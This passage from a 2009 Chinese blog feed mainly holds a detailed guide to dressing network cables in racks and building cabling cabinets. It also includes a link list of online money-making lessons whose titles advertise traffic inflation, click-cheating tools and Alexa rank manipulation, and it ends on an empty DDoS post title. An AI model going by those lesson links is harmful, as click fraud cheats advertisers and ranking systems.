<p><span>2、将网络设备划分至一个网段（192.168.111.），方便管理；</span></p>
<p><span>3、监控设备一个网段（192.168.99.x</span><span>）；</span></p>
<p><span>4、服务器与工作电脑一个网段 （192.168.120.x）</span>；</p>
<p>5、重新安装设备，修改布局，分区域安装</p>
<p>6、机房线缆全部用塑料扎带扎紧，并且做简单标示，体现专业；</p>
<p>7、设备配置重做，确保无误。</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%B8%F6%C8%CB%D7%DC%BD%E1%28%D4%AD%B4%B4%29">个人总结(原创)</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/c451813f7d64ddc87c1e71b0.html#comment">查看评论</a>]]></description>
        <pubDate>2009-10-27  16:38</pubDate>
        <category><![CDATA[个人总结(原创)]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/c451813f7d64ddc87c1e71b0.html</guid>
</item>

<item>
        <title><![CDATA[网络机柜设备安装]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/cb20822a1c535227d42af18a.html]]></link>
        <description><![CDATA[
		
		<font size="3">理线这一名词已经在许多施工人员口中听到，但其含意却各不一样，其原因在于理线的工艺手法不一样。</font>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">为了做到线缆美观，笔者看到过三类理线工艺： </font></p>
<ul>
    <li><font size="3">瀑布造型 </font></li>
</ul>
<blockquote dir="ltr">
<p> </p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">这是一种比较古老的布线造型，有时还能看到其踪影。它采用了&ldquo;花果山水帘洞&rdquo;的艺术形象，从配线架的模块上直接将双绞线垂荡下来，分布整齐时有一种很漂亮的层次感（每层24-48根双绞线）。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">这种造型的优点是节省理线人工，缺点则比较多，例如： </font></p>
<blockquote dir="ltr">
<ol>
    <li><font size="3">安装网络设备时容易破坏造型，甚至出现不易将网络设备安装到位的现象； </font></li>
    <li><font size="3">每根双绞线的重量全部变成拉力，作用在模块的后侧。如果在端接点之前没有对双绞线进行绑扎，那么这一拉力有可能会在数月、数年后将模块与双绞线分离，引起断线故障； </font></li>
    <li><font size="3">万一在该配线架中某一个模块需要重新端接，那维护人员只能探入&ldquo;水帘&rdquo;内进行施工，有时会身披数十根双绞线，而且因双向没有光源，造成端接时看不清。 </font></li>
</ol>
</blockquote></blockquote>
<ul>
    <li dir="ltr"><font size="3">逆向理线 </font></li>
</ul>
<blockquote dir="ltr">
<p> </p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><font size="3">逆向理线是在配线架的模块端接完毕后，并通过测试后，再进行理线。其方法是从模块开始向机柜外理线，同时桥架内也进行理线。这样做的优点是理线在测试后，不会因某根双绞线测试通不过而造成重新理线，而缺点是由于两端（进线口和配线架）已经固定，在机房内的某一处必然会出现大量的乱线（一般在机柜的底部）。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">逆向理线一般为人工理线，凭借肉眼和双手完成理线。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">逆向理线的优点是测试已经完成，不必担心机柜后侧的线缆长度。而缺点是因为线缆的两端已经固定，线缆之间会产生大量的交叉，要想理整齐十分费力，而且在两个固定端之间必然有一处的双绞线是散乱的，这一处往往在地板下（下进线时）或天花上（上进线时）。</font></p>
</blockquote>
<ul>
    <li dir="ltr"><font size="3">正向理线 </font></li>
</ul>
<blockquote dir="ltr">
<p> </p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线是在配线架端接前进行理线。它从机房的进线口开始，将线缆逐段整理，直到配线架的模块处为止。在理线后再进行端接和测试。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线所要达到的目标是：自机房（或机房网络区）的进线口至配线机柜的水平双绞线以每个16/24/32/48口配线架为单位，形成一束束的水平双绞线线束，每束线内所有的双绞线全部平行（在短距离内的双绞线平行所产生的线间串扰不会影响总体性能，因为桥架和电线管中铺设着每根双绞线的大部分，这部分是散放的，是不平行的），各线束之间全部平行；在机柜内每束双绞线顺势弯曲后铺设到各配线架的后侧，整个过程仍然保持线束内双绞线全程平行。在每个模块后侧从线束底部将该模块所对应的双绞线抽出，核对无误后固定在模块后的托线架上或穿入配线架的模块孔内。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线的优点是可以保证机房内线缆在每点都整齐，且不会出现线缆交叉。而缺点是如果线缆本身在穿线时已经损坏，则测试通不过会造成重新理线。因此，正向理线的前提是对线缆和穿线的质量有足够的把握。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线的优点是在机房（主机房的网络区或弱电间）中自进线口至配线架之间全部整齐、平行，十分美观。缺点是施工人员要对自己的施工质量有着充分的把握，只有在基本上不会重新端接的基础上才能进行正向理线施工。在本文中基于目前的布线工程公司已经能够把握工程质量的现实，推荐采用正向理线工艺。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线所需人工约为1.5人，每24根线耗时40分钟左右（未计入寻找线号的时间）。所需工具如下：</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线工具清单 </font></p>
<ul>
    <li><font size="3">理线板： </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">理线板是正向理线的必备工具，它可以采用纤维板、层压板或木板在现场自制，也可以在公司里制作后使用。 </font>
    <p> </p>
    <p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">理线板的制作方法十分简单：测量所用双绞线的缆径，并附加2-4mm后形成理线板的孔径，然后根据板的强度选择孔与孔之间的间距，在板上横向划5根线、纵向划5根线后留有写编号的空间后确定板的长宽尺寸。剪切或锯下多余部分后，使用手枪钻在划线的交叉点上以所确定的孔径钻25个孔后，用粗砂纸将所有的边沿倒角后，在横向写上（或刻上）1-5的编号，在纵向写上（或刻上）A-E的编号后大功告成。</font></p>
    <p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">理线板是一块25孔方板（对应于24口配线架的合适尺寸5×5孔理线板，也可以选用4×6、8×8等规格），单面印字，每孔可以穿1根水平双绞线。可以想象：当双绞线穿入理线板后，彼此之间的相对位置就基本固定，根据其位置进行绑扎时不容易出现大的错位现象，更不易出现线缆的交叉现象。 </font></p>
    </li>
    <li><font size="3">理线表： </font></li>
</ul>
<p> </p>
<p style="text-indent: 2em"><font size="3">理线表<wbr></wbr></font></p>
<p style="text-indent: 2em"><font size="3">目标：使用24口1U配线架，线缆从配线架的右后侧（从配线架背面看）转向配线架，双绞线从线束的底部抽出转向配线架，保证顶部的双绞线一直排列到最后的21～24号模块。</font></p>
<p style="text-indent: 2em"><font size="3">注：图中的1-24编号为配线架模块的编号，不是真正所需填入的、与配线架模块号一一对应的线号。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">理线板需使用相应的理线表配合理线。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">理线表是一张人为定义的表格，当使用5×5理线板时，理线表为5行5列的表格，每个单元格对应一个孔。理线表的填写方法可以有多种，每种填写方法对应于一种排列顺序。在右图中介绍了其中一种排列顺序（孔内数字代表配线架上的模块编号）：</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">在实际填写理线表时，应将与配线架1-24口对应的线缆线号填入理线表，这样线号与配线架的模块号就一一对应。在一般情况下，当配线架布置图完成后，可使用EXCEL的联动功能，自动形成针对每个配线架的理线表。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">正向理线的基本施工工艺如下： </font></p>
<ol>
    <li><font size="3">将配线架固定到位，背后装好托架，正面将打印了线号的面板纸装入配线架（或贴在配线架上），若配线架的模块可以卸下，则应卸下模块；<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">1 标签框中的线号标签 </font></li>
    <li><font size="3">理线板定位：理线板在穿线前先应确定其方向，使理线板在理线过程中不需要硬行扭转方向，就可以使E1孔就近自然对准1号模块，此时理线板上的2-5孔与配线架的2-5号保持平行。通常可以使用这样的方法进行定位：先将理线板垂直放在1号模块背后，使E1孔对着1号模块（有字的一面朝向24号模块），然后手持理线板顺着线缆未来的路由走向，向机房的进线口移动，移动时确保理线板只出现平行移动，不发生转动，当理线板到达进线口时，记下理线板的方位（主要是A1孔位置所在的方位），以便后续每块理线板使用；<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">2 编号线依线号穿入理线板 </font></li>
    <li><font size="3">理线板穿线：在机房的进线口旁，将理线板按2所确定的方位将板的方向调整好，将水平双绞线按线号依理线表穿入理线板（有字的一面对着自己，线从无字的一面穿入板中），这道工序一般有两人完成：一人找到线号（只要找到该理线板所需的线号即可）并将其与其他线缆分离，一人将线穿入理线板的对应孔中。应该注意的是，双绞线应全部穿过理线板，也就是应该将理线板紧贴在进线口旁，这样才能保证进入机房的双绞线全部被整理；<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">3<wbr></wbr> 盘绕后理线板平行上移 </font></li>
    <li><font size="3">路由理线：先在理线板外侧（无字侧）根部用尼龙扎带将穿入理线板的双绞线扎成一束；然后将理线板沿着指定的路由向自己方向平移，平移100mm后在理线板外侧根部用尼龙扎带再绑扎一次（防止前次绑扎松动），此时应注意使线束形成圆形，而线束外侧的线应该是理线板外围一圈的线，理线板中间的线在线束的内部，确定后的所有双绞线的相对平行一直要保持到配线架的最远端的模块后侧（即第24个模块后侧）；继续平移理线板200mm左右，在理线板外侧根部用尼龙扎带绑扎，注意每根线应保持与前次绑扎时的位置相同，不允许有些线从外层转入内层，也不允许内层线转入外层；依次平移，直到配线架为止；<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">4 沿机柜后侧等距绑扎固定 </font></li>
    <li><font size="3">线束固定：在理线过程中，如果旁边遇到桥架上的扎线孔或机柜内的扎线板，则应在绑扎线束的同时将线束绑扎在桥架或机柜上，以免线束下滑； </font></li>
    <li><font size="3">弯角理线：当平移过程中遇到转弯时，必须让理线板贴近转弯角，在弯角旁顺着转弯，不可以绑扎后再贴上弯角（由于弯角处内侧的线短，外侧的线长，因此如果按直线绑扎后再转弯，弯角处的线束一定会变形）。这就要求所有的线束必须在现场绑扎，不可以事先绑扎后后再移到现场来；<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">5 平行转到配线架后侧 </font></li>
    <li><font size="3">托架理线：当理线板到达配线架背后的托架上后，先将线束绑扎在托架上，然后向前平移，每到达一个模块前时，将线束绑扎一次，然后分出该模块对应的线号。此工序应配备2人：1人分线，1人将线从配线架背后拉到配线架正面去（如果模块可以卸下，则将线从模块孔穿到正面去），同时2人唱号核对线号与配线架上的面板编号是否一致； </font></li>
    <li><font size="3">完成理线：当最后一根线穿到配线架正面后，理线板内已经没有一根线了，这时该束线的理线宣告结束。<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
    <li><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">6 从线束底部抽第1根线 </font></li>
    <li><font size="3">将退出的理线板重新拿到进线口，使用下一个24口配线架的理线表，依次重复1-8，完成下一束线的理线工作，直到全部完成。 </font></li>
</ol>
</blockquote>
<ul>
    <li dir="ltr"><font size="3">多束线理线（分支理线）<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr> </font></li>
</ul>
<blockquote dir="ltr">
<p> </p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">7 第1根线穿出模块孔</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">当机柜内有多个配线架时，每个配线架的线束应分别理线。但由于机柜内的扎线板宽度有限（一般宽度为100mm），只能并排绑扎3～4束24根的线束，而深度为800mm的机柜内右侧最多能放2根扎线板（机柜内的水平双绞线应从单侧绑扎，以免影响美观），即可能达不到绑扎200根水平双绞线的目标。这时可以使用二次理线方式，先使用8×8理线板扎出48根的线束（6×8），到一定高度后再添1块5×5理线板将该线束分为2束后，继续理线至配线架。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">8<wbr></wbr> 每根线抽出时绑扎</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">有些公司使用理线梳进行正向理线，这个工具可以避免向理线板穿线这一费时的工序，但理线梳也有缺点。例如：在理线过程中双绞线容易从梳子中逃出；如果理线不能立即完成，数天后理线梳中的线可能已经自行脱离，这时就必须重新将线排入梳中。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">现在，有些布线厂商已经推出了专用的理线器材，但从照片看仿佛需要占用额外的机柜/桥架空间，这也许对于减小线间干扰有益，但同时要求机柜/桥架具有更大的空间。这一点对于每个机柜中需要容纳数百根双绞线时，是需要在施工前有所考虑的。<wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr></font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">9 双绞线依次穿出模块孔</font></p>
<p style="text-indent: 2em"><font size="3"><wbr></wbr></font></p>
</blockquote>
<p> </p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">配线机柜</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">根据上述理线工艺，可以发觉布线系统对机柜有着特殊的要求。在机柜制作厂中，往往有设备机柜（安装公共广播、安防、工控等设备）、通信机柜（安装计算机网络设备、光端箱等设备）、服务器机柜（安装计算机的服务器）和配线机柜（安装综合布线的配线架及计算机网络设备）等类型，在机柜厂中，大多生产设备机柜和服务器机柜，专门用于综合布线系统的配线机柜则很少生产。故许多工程商事实上是使用设备机柜或通信机柜来代替配线机柜。</font></p>
<p style="text-indent: 2em"><wbr></wbr><wbr></wbr><wbr></wbr><font size="3">配线机柜是为综合布线系统特殊定制的机柜。其特殊点在于增添了布线系统特有的一些附件，并对电源的布局提出了特别的要求。例如： </font></p>
<blockquote dir="ltr">
<ol dir="ltr">
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">在机柜的后部左侧（从后向前看，后背板与立柱之间），安装1个前全封闭的金属电源线槽，它从机柜底部一直延伸到机柜顶部，其中最上方的插座专门用于为风扇供电。垂直安装全封闭金属电源线槽的目的是避免对水平双绞线产生电源打扰。在大多数机柜中，使用的是水平安装的电源拖线板，这种结构使部分电源插座与水平双绞线之间的间距小于200mm，因此它不是理想的电源布局结构。</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">扎线板：在机柜的右后侧（从后向前看，后背板与立柱之间），安装2块100mm宽的铁板，板上沿垂直方向每隔10mm开一个5×100mm的腰圆孔，铁板长度为从机柜的底板到顶板。同样，在左后侧（电源线槽与立柱之间）安装一块相同的铁板。走线板的外露面要求平整、无毛刺，以免损伤线缆，这块扎线板紧贴着接地的金属电源线槽，在这边仅可以铺设光缆和传送语音用的大对数电缆；</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">底盘：后部开1个300×200mm的长方型进线孔，用橡皮裹边，以免损伤电缆。在孔上方90mm处，可以安装一块隔板，以求机柜内的美观。</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">前立柱距玻璃门之间将两根垂直理线槽（带盖，插齿型结构，分立在两侧的立柱外）。</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">接地：在机柜中部自低到顶垂直安装一根接地铜带，该铜带上每隔2U等距开1个M6粗牙螺丝孔，以便于屏蔽配线架就近接地，其中最下端的螺丝孔用于机柜引出接地线。机柜的各个金属部件均应接地，以实现机柜的整体接地，而且机柜接地应通过接地铜带上的接地引出线接至机房的接地铜排上。</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">在机柜的两侧应各具有两组并接螺栓孔，并配有并接螺栓，当数个涉密等级相同的配线机柜并排放置在一起时，最好使用并接螺栓将机柜连接成一个整体。</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">配线架安装螺丝应该满配（对于42U机柜而言，需要配84套安装螺丝），去目的是确保配线架、网络设备和空面板全部使用相同的安装螺丝，这样才能保证机柜正面的美观。</font></p>
    <p style="text-indent: 2em"> </p>
    </li>
    <li>
    <p> </p>
    <p style="text-indent: 2em"><font size="3">机柜宜构成可拆卸式，以方便搬运和施工。机柜能够被拆卸成6片（前、后、上、下、左、右），这样便于包装和运输。在到达现场后，可以通过螺丝重新拼装成机柜，当机房门高度有限时，可以在机房内</font></p>
    </li>
</ol>
<p dir="ltr" style="text-indent: 2em"><font size="3">配线架用于综合布线，将网线用打线器按颜色打入配线架，理线架可用来使你在机柜中的布线更美观，信息插座固定在墙上，里面有模块，也要将网线按颜色打入模块中，然后放入信息插座中，上网时只要将网线一头插入微机网卡，一头信息插座中即可</font></p>
<p><font size="3">配线架&nbsp;&nbsp;  －&nbsp;&nbsp;  网络神经的中枢&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  通讯室和设备室的作用就像是布线系统的神经中枢，从工作区接过来的水平线缆在这里的配线架上用互配或交叉的方式连接到设备端口。线缆的互配或交叉连接的是通过模块化连接线或跳线来实现的。&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  配线架由其操作介面可划分为模块化配线架(Patch&nbsp;&nbsp;  Panel)和IDC式配线架，模块化配线架采用模块化跳线(RJ-45跳线)进行线路连接，IDC式配线架可采用模块化的IDC跳插线(俗称&ldquo;鸭嘴跳线&rdquo;如BIX-BIX、BIX-RJ45跳插线)，以及交叉连接跳线(Jumper&nbsp;&nbsp;  Wire,&nbsp;&nbsp;  Crossconnect&nbsp;&nbsp;  Wire)进行线路连接。模块化跳线和IDC跳插线可方便地插拔，而交叉连接跳线则需要专用的压线工具(如BIX压线刀)将跳线压如IDC连接器的卡线夹中。&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  配线架由其安装方式又可分为墙装式或架装式，一般模块化配线架是设计成架装安装，通过墙装支架等附件也可墙装；一般的IDC式配线架通常设计用于墙上安装，通过一些架装附件或专门的设计也可用于架装。&nbsp;&nbsp;&nbsp;&nbsp;  <br>
&nbsp;&nbsp;&nbsp;  <br>
理线架&nbsp;&nbsp;  <br>
理线架可安装于机架的前端提供配线或设备用跳线的水平方向线缆管理；&nbsp;&nbsp;  理线架简化了交叉连接系统的规划与安装,简单说,就是理清网线的,别搞的太乱.跟网络没什么直接的关系,只为以后好管理. </font></p>
</blockquote> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BC%BC%CA%F5%CE%C4%D5%C2">技术文章</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/cb20822a1c535227d42af18a.html#comment">查看评论</a>]]></description>
        <pubDate>2009-10-26  15:36</pubDate>
        <category><![CDATA[技术文章]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/cb20822a1c535227d42af18a.html</guid>
</item>

<item>
        <title><![CDATA[网赚培训]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/1e2a82cab806284cf31fe7d5.html]]></link>
        <description><![CDATA[
		
		<p><font size="3">第一课 网赚的基础<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028540.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028540.html</font></a></p>
<p><br>
<font size="3">第二课 网赚的几种形式以及优缺点<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028576.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028576.html</font></a></p>
<p><br>
<font size="3">第三课 网赚常用专业术语 以及 网赚常见的误区<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028603.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028603.html</font></a></p>
<p><font size="3">第四课 新手如何选择适合自己的网赚项目<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028642.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028642.html</font></a></p>
<p><br>
<font size="3">第五课 建站赚钱之新手如何选择广告联盟<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028807.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028807.html</font></a></p>
<p><font size="3">第六课-如何选择域名和空间<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028855.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028855.html</font></a></p>
<p><br>
<font size="3">第七课-新手快速建设自己的网站和博客<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028891.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028891.html</font></a></p>
<p><font size="3">第八课&mdash;-以万网举例解析如何选择优秀的虚拟主机<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20028957.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20028957.html</font></a></p>
<p><font size="3">第九课- 如何刷流量以及识别流量作弊的网站<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20029071.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20029071.html</font></a></p>
<p><br>
<font size="3">第十课-网赚作弊之点击专家以及菜鸟刷Alexa排名<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20057025.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20057025.html</font></a></p>
<p><br>
<font size="3">第十一课---赚钱实例解析一.手工SEO与百度知道宣传获得高流量<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20152029.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20152029.html</font></a></p>
<p><font size="3">第十二课---赚钱实例解析二.加入弹窗联盟利用P2P软件挂机赚钱<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20289681.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20289681.html</font></a></p>
<p><br>
<font size="3">第十三课-重磅出击,诱惑页+第三页实战演练<br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20409984.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20409984.html</font></a></p>
<p><br>
<font size="3">第十四课---解密发放6位QQ号广告网赚项目内幕 <br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20556714.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20556714.html</font></a></p>
<p><br>
<font size="3">第十五课---调客项目网赚全解析 <br>
</font><a href="http://xiaodaocn.blogbus.com/logs/20663223.html"><font size="3">http://xiaodaocn.blogbus.com/logs/20663223.html</font></a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BE%AB%C6%B7%CE%C4%D5%C2">精品文章</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/1e2a82cab806284cf31fe7d5.html#comment">查看评论</a>]]></description>
        <pubDate>2009-09-24  12:58</pubDate>
        <category><![CDATA[精品文章]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/1e2a82cab806284cf31fe7d5.html</guid>
</item>

<item>
        <title><![CDATA[DDoS攻击实施的方法总结]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/90db0fafd6c569f1faed50c9.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<p> </p>
